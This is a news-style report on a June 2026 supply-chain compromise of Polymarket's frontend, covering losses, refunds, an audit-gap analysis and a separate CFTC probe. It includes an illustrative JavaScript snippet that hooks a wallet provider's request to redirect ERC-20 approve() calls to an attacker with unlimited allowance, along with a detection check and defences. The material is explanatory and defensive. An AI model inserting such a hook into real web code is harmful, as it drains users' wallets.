Attackers did not break Polymarket's smart contracts. They compromised a third-party frontend vendor, served malicious JavaScript through the legitimate prediction-market site, and tricked users into signing approvals they had not intended to make.
The incident was disclosed on June 26, 2026. According to BleepingComputer, hackers compromised a vendor dependency and injected a malicious script into Polymarket's frontend. Users visiting the official site were led into signing fraudulent transaction approvals. Polymarket confirmed its own servers and backend infrastructure were not affected.
On June 27, CoinDesk updated the loss figure to $3.1M, drained from 11 wallets. The stolen pUSD was swapped and bridged from Polygon to Ethereum, converting to approximately 1,893 ETH. Blockchain intelligence firm AMLBot was tracking the on-chain movement as of that update.
Polymarket said it would reimburse affected users. “We’re contacting impacted users and refunding them in full,” the platform told users, according to CoinDesk. The company characterized the incident as contained.
Halborn's post-mortem identified the structural gap: the attacker inserted malicious code into the Web2 frontend dependency layer, the part of the stack that standard smart-contract audits do not assess. Audits verify on-chain logic. They do not cover every third-party JavaScript integration that can shape what a user sees and signs.
That distinction matters because code embedded in the interface can access user sessions and rewrite transaction approvals before they reach the chain. The chain then faithfully executes whatever the user signed, so a perfectly audited contract will honour an approval the user never meant to grant. Halborn characterized the incident as a distinct and growing threat class: contracts can be sound while the interface relaying user actions to them remains exposed.
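The following is an added illustration of the general pattern Halborn describes, not code from the page, from Polymarket, from Halborn, or from the actual injected script (whose mechanics the reporting does not detail). It shows how a script running in the page can monkey-patch the wallet provider's `request` and swap the spender in an ERC-20 `approve()` call before the wallet ever sees it, next to a check that decodes the calldata and compares the spender and allowance against what the dApp intended. The token, spender and attacker addresses, and the stand-in provider, are constructed for the example.

```javascript
// Added example: a frontend-dependency compromise rewriting approve() calldata,
// and a check that detects the rewrite. Not Polymarket's or Halborn's code.

// First 4 bytes of keccak256("approve(address,uint256)").
const APPROVE_SELECTOR = "0x095ea7b3";

// Constructed addresses for this example (hypothetical, not real contracts).
const TOKEN         = "0x3333333333333333333333333333333333333333";
const LEGIT_SPENDER = "0x1111111111111111111111111111111111111111";
const ATTACKER      = "0x2222222222222222222222222222222222222222";
const MAX_UINT256   = (1n << 256n) - 1n;

// Left-pad a hex string (with or without 0x) to a 32-byte ABI word.
function pad32(hex) {
  return hex.replace(/^0x/, "").toLowerCase().padStart(64, "0");
}

// ABI-encode approve(spender, amount): selector + two 32-byte words.
function encodeApprove(spender, amount) {
  return APPROVE_SELECTOR + pad32(spender) + pad32(amount.toString(16));
}

// Decode approve() calldata; returns null for anything else.
function decodeApprove(data) {
  const d = data.toLowerCase();
  if (!d.startsWith(APPROVE_SELECTOR) || d.length !== 10 + 128) return null;
  const spender = "0x" + d.slice(10 + 24, 10 + 64); // last 20 bytes of word 1
  const amount = BigInt("0x" + d.slice(10 + 64));   // word 2
  return { spender, amount };
}

// What a compromised dependency can do to a transaction on its way to the
// wallet: keep the token contract as the target, but redirect the allowance
// to the attacker with an unlimited amount. Returns a new object; the dApp's
// own copy is left untouched, so nothing in the UI looks different.
function rewriteApproveToAttacker(tx) {
  if (!decodeApprove(tx.data || "")) return tx;
  return { ...tx, data: encodeApprove(ATTACKER, MAX_UINT256) };
}

// Minimal stand-in for an EIP-1193 provider (window.ethereum). Records what
// actually reached the wallet and returns a fake tx hash.
function makeProvider() {
  const sent = [];
  return {
    sent,
    async request({ method, params }) {
      if (method === "eth_sendTransaction") sent.push(params[0]);
      return "0x" + "ab".repeat(32);
    },
  };
}

// The injection point: once malicious JS runs in the page it can replace
// provider.request and interpose on every transaction the dApp submits.
function injectMaliciousHook(provider) {
  const original = provider.request.bind(provider);
  provider.request = async (args) => {
    if (args.method !== "eth_sendTransaction") return original(args);
    const tampered = rewriteApproveToAttacker(args.params[0]);
    return original({ ...args, params: [tampered] });
  };
}

// Defensive check: decode approve() calldata and reject an unexpected spender
// or an allowance above a cap. Returns a reason string to block, else null.
function checkApprove(tx, allowedSpenders, maxAmount) {
  const call = decodeApprove(tx.data || "");
  if (!call) return null; // not an approve(); out of scope here
  if (!allowedSpenders.has(call.spender.toLowerCase())) {
    return `unexpected spender ${call.spender}`;
  }
  if (call.amount > maxAmount) return `allowance ${call.amount} exceeds cap`;
  return null;
}

// Worked run: what the dApp built versus what reached the wallet.
async function demo() {
  const intended = { to: TOKEN, data: encodeApprove(LEGIT_SPENDER, 1000n) };
  const provider = makeProvider();
  injectMaliciousHook(provider);
  await provider.request({ method: "eth_sendTransaction", params: [intended] });
  const reached = provider.sent[0];
  const allowed = new Set([LEGIT_SPENDER.toLowerCase()]);
  return {
    intended: decodeApprove(intended.data),
    reached: decodeApprove(reached.data),
    verdict: checkApprove(reached, allowed, 10000n),
  };
}

demo().then((r) =>
  console.log(JSON.stringify(r, (k, v) => (typeof v === "bigint" ? v.toString() : v), 2))
);
```

The caveat a practitioner will see immediately: `checkApprove` only helps if it runs somewhere the injected script cannot also patch. A check living in the same page context is as compromised as the rest of the frontend. In practice the decoded spender and amount have to be surfaced by the wallet (or a simulation layer it trusts) for the user to confirm, and the scripts themselves pinned with Subresource Integrity hashes and a restrictive Content-Security-Policy so a swapped vendor bundle fails to load rather than runs.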
The hack also landed during a difficult regulatory week for Polymarket. Bloomberg and CNBC reported on June 26, citing a source familiar with the matter, that the Commodity Futures Trading Commission is conducting a broad probe into Polymarket's business and social media marketing practices.
The investigation is separate from a prior CFTC and DOJ inquiry that was dropped without charges in 2025. It centers on alleged undisclosed paid promotion, not on the hack, but the two developments arrived the same week.